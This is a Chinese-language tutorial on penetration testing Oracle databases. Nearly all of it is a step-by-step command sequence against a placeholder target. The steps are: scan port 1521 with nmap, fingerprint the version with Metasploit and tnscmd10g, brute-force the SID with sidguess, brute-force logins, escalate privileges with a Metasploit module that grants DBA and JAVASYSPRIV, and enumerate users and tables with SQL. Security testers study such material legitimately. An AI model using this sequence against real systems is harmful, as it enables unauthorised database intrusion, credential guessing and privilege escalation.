Oracle Database,又名Oracle RDBMS,或簡稱Oracle。是甲骨文公司的一款關系數據庫管理系統。它是在數據庫領域一直處於領先地位的產品。可以說Oracle數據庫系統是目前世界上流行的關系數據庫管理系統,系統可移植性好、使用方便、功能強,適用於各類大、中、小、微機環境。它是一種高效率、可靠性好的 適應高吞吐量的數據庫解決方案。針對Oracle數據庫如何測試呢?
檢測數據庫端口是否開放
這個任務可以使用nmap來對目標IP進行測試,也可以使用其他的端口掃描工具,下面就以nmap為例,可以使用如下命令:
nmap -Pn -n -T4 --open -p1521 <target IP>
檢查數據庫的版本信息
得到一個存活的oracle數據庫服務端口,了解數據庫的版本信息非常關鍵,針對不同的版本會有不一樣的測試方式,有不同的安全漏洞需要不同的poc來對其進行測試,所以在測試之前首先要了解數據庫的版本,下面說幾個方法。
1 利用msf
使用如下模塊來對數據庫進行版本探測:
msf > use auxiliary/scanner/oracle/tnslsnr_version
2 使用tnscmd10g
tnscmd10g是kali下的一個工具,命令如下:
tnscmd10g version -h <target IP>
tnscmd10g status -h <target IP>
通過上述命令可以得到版本信息、日志文件、跟蹤信息以及端口信息
獲取數據庫的SID
連接oracle數據庫不僅需要賬號密碼,而且還需要SID(SID是一個數據庫的唯一標識符!是建立一個數據庫時系統自動賦予的一個初始ID),所以如何獲取SID是非常關鍵的,可以使用以下方法獲取:
1 使用msf
msf下有兩個模塊可以完成這個操作,命令如下:
msf > use auxiliary/scanner/oracle/sid_enummsf > use auxiliary/admin/oracle/sid_brute
2 使用sidguess
sidguess是kali下的一款爆破Oracle SID的工具,命令如下:
sidguess -i <target IP> -d /home/myh0st/pass.txt
3 針對自帶web管理平台
如果oracle的版本為10g,默認自帶通過8080端口遠程管理的可以訪問以下路徑:
http://<;target IP>:8080/oradb/PUBLIC/GLOBAL_NAME
枚舉數據庫賬號密碼
枚舉爆破數據庫連接賬號密碼可以使用下面的方式。
1 使用msf
使用這個模塊需要指定SID,就是要在獲取到SID后才能使用,使用模塊如下:
msf > use auxiliary/admin/oracle/login_brute
set SID <sid>
2 使用sqlplus
sqlplus是oracle自帶的數據庫管理工具,可以使用以下命令登錄數據庫,也可以自己寫腳本來枚舉賬號密碼:
sqlplus <username>/<password>@<target IP>:<port>/<SID>
使用sql命令提權
在獲取到數據庫登錄口令后,如何對數據庫進行提權操作?可以使用msf下的兩個模塊,命令如下:
msf > use auxiliary/admin/oracle/sql set DBUSER <user> set DBPASS <password> set SID <sid> set SQL select * from user_role_privs
msf > use auxiliary/admin/oracle/pushin/lt_findricset_cursor set DBUSER <user> set DBPASS <password> set SID <sid> set SQL GRANT DBA TO <user> set SQL GRANT JAVASYSPRIV TO <user>
獲取數據庫里關鍵信息的sql命令
查詢數據庫版本:
select * from v$version;
數據庫打補丁情況:
select * from dba_registry_history;
查看所有用戶:
select * from all_users;
查詢數據庫中的所有表:
select owner,table_name from all_tables;
當前用戶被激活的角色:
select * from session_roles;
描述數據庫對象:
desc utl_http